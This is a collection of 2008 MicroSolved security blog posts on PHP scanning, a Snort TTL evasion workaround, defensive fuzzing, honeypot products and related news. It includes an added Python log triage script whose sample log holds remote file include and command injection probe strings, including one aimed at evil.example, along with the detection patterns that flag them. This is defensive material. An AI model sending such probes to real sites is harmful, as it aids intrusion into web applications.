About Brent Huston

I am the CEO of MicroSolved, Inc. and a security evangelist. I have spent the last 20+ years working to make the Internet safer for everyone on a global scale. I believe the Internet has the capability to contribute to the next great leap for mankind, and I want to help make that happen!

Project Pre-Release – Vulnerabilities in Popular Content Management Systems Under Study

Over the next few weeks you will see more details from us about a project that we have been working on. As a part of our relationship with Syhunt, one of our elite partners for application security work, we have been testing and reviewing their new tool, Sandcat4PHP. The tool is a sophisticated and user-friendly source code scanner for performing deep analysis of PHP applications, including their surrounding JavaScript and HTML components.

Stay posted here for a pretty in-depth review of the new tool, its use and capabilities. We will be doing that review as a part of the project as well.

First, let me start with the purpose and the scope of the project. In the last few months we have worked with a number of clients who have had issues with the security of their content management system. More than a few of them are using popular products, but several are using proprietary tools as well. As such, we have worked on a few incidents and application reviews. That led to a pretty in-depth discussion between a couple of clients and ourselves about the state of content management system security, in general. As an offshoot of that discussion, we decided to test 5 of the most popular content managers using the new Syhunt PHP scanner, since we needed to review it anyway.

Next, we obtained a couple of lists of popular content managers. Selecting our five was pretty easy and we settled on the following:

WordPress, Joomla!, Mambo, Drupal and BitWeaver

We then downloaded the current version of each CMS (as of that day, a couple of weeks ago…) and set up our testing environment.

We assessed the entire package, but only as downloaded from the web site. That means in most cases, that we tested only the core components and not any additional modules, plugins or components. We considered whatever was in the default download to be the basis for our work.

To date, we have begun our assessments and review of the CMS tools. We will be in contact with each of the CMS projects about the findings of the assessments and they will receive the details of the tool’s findings prior to public release of the technical details. Statistical and numeric data will also be forthcoming.

For now just let us say that we are evaluating our findings and that the tool performed very very well.

I look forward to sharing the details with everyone in the coming days.

Let me know if you have any questions about the product, the project or the work.

June Virtual Event Announced – Social Engineering Assessments Primer

We are proud to announce our June Virtual Event topic for the month. Please join us as we cover a primer for social engineering assessments and how they can assist you in securing your organization. As always, our virtual events are long on information and short on sales and spin. They are also FREE!

Abstract:

This presentation will cover the reasons why your organization should consider a social engineering assessment as a part of their routine security auditing processes. Examples of test scenarios will be given, along with ideas on scoping such tests. Further, ways to appropriately use the results and tips on presenting the identified issues to upper management will be discussed.

Date: Tuesday, June 26th at 4pm Eastern

To register for the presentation and to receive the PDF of the slides as well as the dial in number, please send email to info@microsolved.com with “June Virtual Event” or the like in the subject line.


Editor’s note: Sorry for the need to create a subject clarification, but we are holding several events this month including live and virtual versions of our State of the Threat presentations. If you need more info about those presentations, just ask. Thanks!

Increases in PHP Scanning

We are detecting increasing PHP scans for a series of known PHP vulnerabilities that thus far are originating from Asia.

To date, we see no new attacks, just checks for known bad pages, particularly admin interfaces and a couple of quick URLs to test for command injections. The scans seem to have begun in the last 24 hours and the traffic appears to be related to a possible new PHP scanner. Likely, some new tool has been released that contains checks for a plethora of PHP vulnerabilities.

Organizations should ensure that any systems offering PHP or PHP applications have been properly assessed and patched.

HoneyPoint Security Server users are urged to deploy a web HoneyPoint or HornetPoint and to drop the hosts performing the scans into your firewall or router black hole lists. This should allow you to create a “one strike and you’re out” approach for black holing attacking systems.
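A small triage script, added here as an example and not part of the original post, that reads access log lines in Common Log Format, flags hosts requesting admin interfaces or sending command-injection style URLs, and renders the null-route entries for a “one strike and you’re out” black hole list. The probe signatures, the log lines and the addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2008:03:14:01 -0400] "GET /phpmyadmin/ HTTP/1.0" 404 169
203.0.113.7 - - [10/Jun/2008:03:14:02 -0400] "GET /admin/login.php HTTP/1.0" 404 169
198.51.100.9 - - [10/Jun/2008:03:15:10 -0400] "GET /index.php?page=http://evil.example/x.txt? HTTP/1.0" 200 2311
198.51.100.9 - - [10/Jun/2008:03:15:11 -0400] "GET /cmd.php?cmd=%3Bid HTTP/1.0" 404 169
192.0.2.44 - - [10/Jun/2008:03:16:00 -0400] "GET /index.php HTTP/1.1" 200 5120
192.0.2.44 - - [10/Jun/2008:03:16:05 -0400] "GET /about.php HTTP/1.1" 200 3100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')

# Hypothetical probe signatures. The admin paths assume the monitored host
# (a decoy, like a web HoneyPoint) serves no such interface, so any request
# for them is illegitimate; tune the list for a real application server.
ADMIN_PATHS = ("/phpmyadmin/", "/admin/", "/administrator/", "/wp-admin/")
# Shell metacharacters or "=http://" (remote file include) in the decoded URL.
INJECTION_RE = re.compile(r"(?:[;|`]|\$\(|=https?://)", re.IGNORECASE)


def classify(url):
    """Return a probe category for the URL, or None if it looks benign."""
    decoded = unquote(url)
    path = decoded.split("?", 1)[0].lower()
    if any(path.startswith(p) for p in ADMIN_PATHS):
        return "admin-probe"
    if INJECTION_RE.search(decoded):
        return "injection-probe"
    return None


def suspicious_hosts(log_text, threshold=1):
    """Map source IP -> probe categories seen, keeping hosts at or above threshold."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        reason = classify(m.group("url"))
        if reason:
            hits[m.group("ip")].append(reason)
    return {ip: reasons for ip, reasons in hits.items() if len(reasons) >= threshold}


def blackhole_commands(hosts):
    """Render Linux null-route commands (iproute2 syntax) for the flagged hosts."""
    return [f"ip route add blackhole {ip}/32" for ip in sorted(hosts)]


if __name__ == "__main__":
    flagged = suspicious_hosts(SAMPLE_LOG)
    for ip, reasons in flagged.items():
        print(f"{ip}: {', '.join(reasons)}")
    print("\n".join(blackhole_commands(flagged)))
```

Raise the threshold above 1 if a single odd request should not be enough to black hole a host.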

Please let us know if you see any new PHP activity. We are currently watching this pattern for any zero-day type activity, but thus far we have observed only known security issues being probed.

SHOCKER – The FBI says Wi-Fi Hotspots are Insecure!!!

It’s hard to believe, but the FBI has recently announced that Wi-Fi Hotspots might not be secure.

I read it here, so it must be true… 😉

In a way I am glad to see public notices like this. Maybe if the FBI draws attention to the problems, average people will pay attention to the solution. Of course, their mitigation suggestions include the “keep your computer patched, use firewall and encryption” routine.

The sad part is that you can do all of these things and still fall victim to a number of security issues such as DNS poisoning, DHCP spoofing, social engineering and a myriad of other problems. I guess that is a perfect reason why we push so hard for average folks to use our HoneyPoint:Network Trust Agent product. At less than 10 bucks, it adds yet more capability and ease of use to protecting even non-technical users when they are on untrusted networks, including Wi-Fi.

Public networks are likely to remain unsafe for users who are not vigilant for a long time to come. Firewalls and patches can help keep them safe, but until they make better decisions about information security and can resist many of the basic attacks that leverage social engineering and the like, free Wi-Fi will likely be a cyber-wild west for a while longer.

If you want to hear more about protecting mobile users against public network threats, drop us a line. Until then, we will wait to hear from the FBI. Maybe they can help us get the word out that there is help available for Wi-Fi users.

Time to Play Some Offense…

To quote Allan Bergen, it sure looks like it might be “time to play some offense”…

I read today that the primary security concern of IT managers is the insider threat. That doesn’t surprise me, because I have been working on educating organizations for several years about the seriousness of the insider threat. In fact, I would suggest that there are very, very few threats that are NOT insider threats. Why? Because there really is no inside or outside. Thanks to disruptive technologies and evolved attacker capabilities – just about everything is exposed to attack. Just ask some of the recent vendors who were compromised in high profile “PCI-related” cases how well they feel that their “perimeter security” protected them…

The truth is, there are three powerful things that can be done to combat modern attacks, whether internal-based or executed by attackers half a world away.

1. Implement and enforce data classification – Know where your critical assets are, how they move around your environment throughout their lifecycle and then use tools like access controls, encryption and integrity verification to make sure that they are protected. Use logging analysis and event management to detect issues and make sure all of the controls, including role-based access controls, are HEAVILY and PERIODICALLY tested.

2. Embrace enclaving – Enclaving is like defense in depth throughout the whole network. Establish proper need-to-know boundaries, then build enclaves of security mechanisms around the data. Don’t build networks that trust user workstations with access to databases and other servers; segregate them with firewalls, detection mechanisms and access controls. Build as much security for the users as makes sense, but design the environment so that if users make bad decisions (which they will) and get popped – so what! Client-side exploits and malware are only a concern if users have access to inordinate amounts of data. The problem is making sure that you get your controls and practices tight enough to limit the exposure that user compromise presents. That alone should go a LONG way toward minimizing your risk if done properly.

3. Move up the security stack to Threat Management and Risk Assessment – Use processes like risk assessment as a factor in business decision making. Security can truly empower business, but you have to let security teams stop being the “patch patrol” and “net cop” and let them get to actually helping you manage risk. They have to be able to identify threats, model threats and understand attacks and exposures. That requires education, dependable tools and upper management support. Encourage your security team to mature and begin to take real-world risk into consideration. Help them to resist the cult of the arcane technical security issue…

Of course, MicroSolved can help you with all three of these areas. We have the experience, insight and expertise to help you build effective enclaves and design data classification systems that make sense. We can help your team find security assessment goals that make more sense and provide ongoing assessment to keep them focused on the real-world risks. Our HoneyPoint products can help them model threats, frequency of attacks, understand the capability and intent of attackers and even give them deep insight into proactive risk metrics that they can leverage for “more science than academic” metrics of risk measurement. All of these things help your organization protect against the insider threat. All of them are available today.

The bottom line is this – if you are an IT manager looking to defend against the insider threat – give us a call. Together we can apply these strategies and others that your organization may need to effectively manage their risk and protect their assets.

At MicroSolved, we think differently about information security. So should you.

Snort Issues In Case You Missed Them and Malicious SWF

In case you missed it last week, Snort seems to be suffering from a problem with odd TTL values, which could allow an attack to get by Snort without detection. Snort 2.8.1 has been released and includes the fix for the issue. Users of Snort should upgrade as soon as possible or apply the following workaround until they can update:

/From iDefense/

In the snort.conf file, set the ttl_limit configuration value to 255 as shown below.

preprocessor frag3_engine: ttl_limit 255

This will set the allowable difference to the maximum possible value, and prevent fragments from being dropped.

/End iDefense Content/
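To make concrete what the “allowable difference” is, here is a simplified model of the frag3 TTL check, added as an example and not Snort’s or iDefense’s code: a fragment whose TTL is more than ttl_limit hops away from the first fragment’s TTL is discarded, so with the assumed default of 5 the sensor can lose fragments the end host still reassembles, while 255 never discards any. A small checker also reads the frag3_engine line(s) from a snort.conf to confirm the workaround is in place; the default value and the sample TTLs are assumptions.

```python
# Assumed frag3 default; the iDefense workaround raises it to the maximum, 255.
DEFAULT_TTL_LIMIT = 5


def accepted_fragments(ttls, ttl_limit=DEFAULT_TTL_LIMIT):
    """Fragments frag3 keeps: those whose TTL is within ttl_limit hops of the
    first fragment's TTL (a simplified model of the preprocessor's check)."""
    if not ttls:
        return []
    reference = ttls[0]
    return [t for t in ttls if abs(t - reference) <= ttl_limit]


def ids_sees_whole_datagram(ttls, ttl_limit=DEFAULT_TTL_LIMIT):
    """True when no fragment is discarded, so the IDS reassembles the same
    datagram the end host does; False means the sensor is blind to it."""
    return len(accepted_fragments(ttls, ttl_limit)) == len(ttls)


def ttl_limits(snort_conf):
    """ttl_limit configured on each 'preprocessor frag3_engine' line of a
    snort.conf (None where the line does not set it)."""
    found = []
    for line in snort_conf.splitlines():
        line = line.split("#", 1)[0].strip()  # drop trailing comments
        if not line.startswith("preprocessor frag3_engine"):
            continue
        tokens = line.replace(":", " ").split()
        found.append(int(tokens[tokens.index("ttl_limit") + 1])
                     if "ttl_limit" in tokens else None)
    return found


def workaround_applied(snort_conf):
    """True only if every frag3 engine in the file sets ttl_limit 255."""
    limits = ttl_limits(snort_conf)
    return bool(limits) and all(v == 255 for v in limits)


if __name__ == "__main__":
    # Constructed fragment TTLs: one fragment close to the first, one far off.
    sample = [64, 60, 120]
    print("default limit, IDS reassembles datagram:", ids_sees_whole_datagram(sample))
    print("ttl_limit 255, IDS reassembles datagram:", ids_sees_whole_datagram(sample, 255))
    print("workaround applied:", workaround_applied("preprocessor frag3_engine: ttl_limit 255"))
```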

Also, SANS is talking about malicious SWF files that have been found online. Looks like they are using some encoded images that can cause some issues with what may be a previously known Flash Player vulnerability. Advise your users to be wary of Flash-enabled sites that they would consider “untrusted”. Of course, your mileage may vary with this one, but at least awareness might help…

Lastly, as a refresher, if you are a Notes/Domino user, it might be a good idea to check out patches that have been released lately. There have been a number of issues in the last few weeks and we are seeing an increase in Domino fingerprinting on some of our non-US HoneyPoints. Looks like quick scans for names.nsf and a couple of other common Notes files. So far though, we have not seen any attacker activity out of the norm, but it may be the precursor to an attack or other activity. Just an FYI…

What is “Defensive Fuzzing”?

Since the release of HornetPoints with the newest version of HoneyPoint Security Server, I have been getting a lot of mail asking about “defensive fuzzing”. I thought I would take a moment and talk a little bit about it and explain a bit about its uses.

Defensive fuzzing is a patent-pending approach to network, system and application defense. It is based on the idea of using techniques from “fuzz testing”, but applying them against incoming connections in a defensive manner rather than as a test mechanism for known software. The idea is that attacker tools and malware probably fail to meet established best practices for software development and thus, are likely to have issues with unexpected input just as normal professionally developed software does. Further, “defensive fuzzing” lends itself to using fuzzing techniques as a protective mechanism to cause attacker tools, malware and other illicit code to abnormally terminate. Basically, by fuzzing incoming connections to a HornetPoint (which should have no real world use, thus all incoming connections are illicit) we can terminate scans, probes, exploits, worms, etc. and reduce the risk that our organization (and other organizations) face from these attacks.

For those of you who might not be familiar with fuzzing, you can read more about the basics of it here. However, keep in mind, that defensive fuzzing applies these techniques in new ways and for a protective purpose rather than a software testing process.

HornetPoints simply embody this process. They can be configured to fuzz many types of existing connections, emulating varying protocols and applications. For example, targeting spam and relay scanners can be done by implementing the SMTP HornetPoint. It listens on the SMTP port and appears to be a valid email relay. Instead, however, it not only captures the source and traffic from the spammers, but also fuzzes the connection as the spam is sent, attempting to terminate the spammer scanning tool, bot-net client or other form of malware that is generating the traffic. Obviously, success rates vary, but our testing has shown the process to be quite effective against a number of tools and code bases used by attackers today.

That is just one example and many more are possible. For more information about defensive fuzzing or HornetPoints, please leave us a comment or contact us. We would be happy to discuss this evolution in security with you!

HoneyPoint Security Server Creates Proactive Protection

Columbus, Ohio; May 19, 2008 – MicroSolved, Inc. is pleased to announce the general availability of HoneyPoint™ Security Server version 2.50.

This latest release of their best-of-breed corporate honeypot product expands its capabilities to include new types of bleeding-edge protection in the form of HornetPoints and HoneyPoint Trojans. HornetPoints introduce a pioneering and patent-pending approach called “defensive fuzzing” that identifies and stops attacker activity in its earliest stage of reconnaissance, in some cases literally eliminating bot-net and zero-day attacks before they have a chance to begin and propagate. HoneyPoint Trojans, modeled after the counter-intelligence efforts of nation states, enable organizations to create pockets of “dis-information” that, once touched, create a forensic tracking capability that follows its movement inside the network or out. Imagine the ability to literally turn the tables on attackers as you follow how this data is spread and used as it moves around the world.

“The addition of HornetPoints to the product really takes things to a new level. For the first time, organizations can proactively create protection that is robust, effective and capable of automatically defending them against many forms of attack,” declared Brent Huston, CEO of MicroSolved. “Add the HoneyPoint Trojans to that mix and you finally have organizations that are capable of removing the layers of confidentiality, integrity and availability from attackers. Used properly and creatively, the product lends itself well to the creation of a corporate counter intelligence program,” Huston added.

“Any organization that wants to improve their traditional security approach from a “defense-only” posture to a new and pro-active mode of protection, simply must have a look at HoneyPoint. I don’t care how many layers of defense you have… it’s time to play some offense,” said Allan Bergen, Business Development Director of MicroSolved.

For details on obtaining the 2.50 upgrades and/or to discuss the product or its new features, please contact a MicroSolved account executive. For more information, please visit www.microsolved.com/honeypoint

About MicroSolved, Inc.

MicroSolved, Inc. was founded in 1992, making it one of the most experienced information security services companies in the world. Providing risk assessment, ethical hacking, penetration testing and security intelligence to organizations of all sizes has been their passion for more than a decade. Today, they secure businesses on a global scale and still provide expertise close to home. From governments to the Fortune 500 and from small business to your business, they are the security experts you can trust.

Press Contacts

Brent Huston
CEO & Security Evangelist
(614) 351-1237 x201
Info@microsolved.com

Allan Bergen
Business Development Director
(614) 351-1237 x250
Info@microsolved.com

Fear Renewed: The Cisco Router Rootkit

The media is all abuzz about a possible Cisco router rootkit that may be part of a presentation at a near future security conference.

While various issues with Cisco gear have emerged over the years and there has been at least one really public overreaction on the part of Cisco to vulnerability disclosure talks, there is probably little to really get spun up about here for the average corporate manager or infosec person.

The big news is that hostile, difficult to detect code could be introduced to routers at any point in their lifespan if an attacker has access to introduce images onto the router. This is a common problem with almost every type of device. There have been a number of trojan horse loads for everything from home firewalls to other forms of network gear for a number of years. Sure, the Cisco router is almost ubiquitous, and sure, it powers a lot of the Internet at large, but I think we pretty much always assumed that attackers with physical access and opportunity could introduce bad things to a device if they gained opportunity.

So before you give in to the hype or fear mongering, consider how this is different than any other form of software/firmware or the like. Likely, you already have a process in place for blowing new firmware onto all devices you purchase before putting them into use (right???). If not, it might be time to think about writing one…

April Virtual Event MP3 Available – Selling Security to Upper Management

We are pleased to announce the availability of the MP3 from last month’s virtual event that covered the selling of security to upper management.

We got great feedback on the event and plan to continue our monthly virtual presentations. If there are topics you would like to see us cover or want us to dig into, please drop us a line or comment.

The slides for this presentation are available here.

The MP3 is available here.

Thanks again for spending time with us. We really love working with each and every one of you!